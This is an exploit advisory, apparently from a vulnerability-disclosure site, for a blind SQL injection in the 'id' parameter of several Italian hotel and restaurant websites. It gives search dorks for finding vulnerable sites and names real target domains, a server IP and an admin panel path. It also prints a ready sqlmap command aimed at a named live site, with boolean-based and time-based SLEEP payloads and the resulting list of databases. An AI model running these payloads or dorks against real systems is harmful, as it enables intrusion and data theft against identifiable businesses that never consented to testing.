Italian Hotels Blind SQL Injection vulnerability

2019.11.30
sa H9xHacker (SA) sa
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title:Italian Hotels Blind SQL Injection vulnerability # Date:30/11/2019 # Dork: inurl:camere-dettaglio.php?id= site:.it inurl:restaurant-news-detail.php?id= site:.it inurl:rooms-suites.php?id= site:.it inurl:room.php?id= site:.it inurl:rooms-suites.php?id= site:.it # Exploit Author:H9xHacker # Tested on:Linux Reverse check bing.com ip:151.11.51.124 .php?id= (There are 202 domains hosted on this server.) # Demo ristorantelaspada.it/en/restaurant-news-detail.php?id=32 lungarnovespucci50.com/en/camere-dettaglio.php?id=9 hotelbeyfin.com/de/rooms-suites.php?id=27 # Admin control panel path http://www.website.com/cms-admin/ OR http://www.website.it/cms-admin/ # Poc: sqlmap --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u 'http://ristorantelaspada.it/en/restaurant-news-detail.php?id=32' --no-cast --batch --dbs --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=32' AND 2568=2568-- AtOc Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: id=32' OR (SELECT 9574 FROM (SELECT(SLEEP(5)))kdFW)-- xPIg --- web application technology: Apache, PHP back-end DBMS: MySQL >= 5.0.12 available databases [2]: [*] information_schema [*] ristorantelaspada_it_01 ------------------------ Greets:Black Hat Hackers


Vote for this issue:
33%
67%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top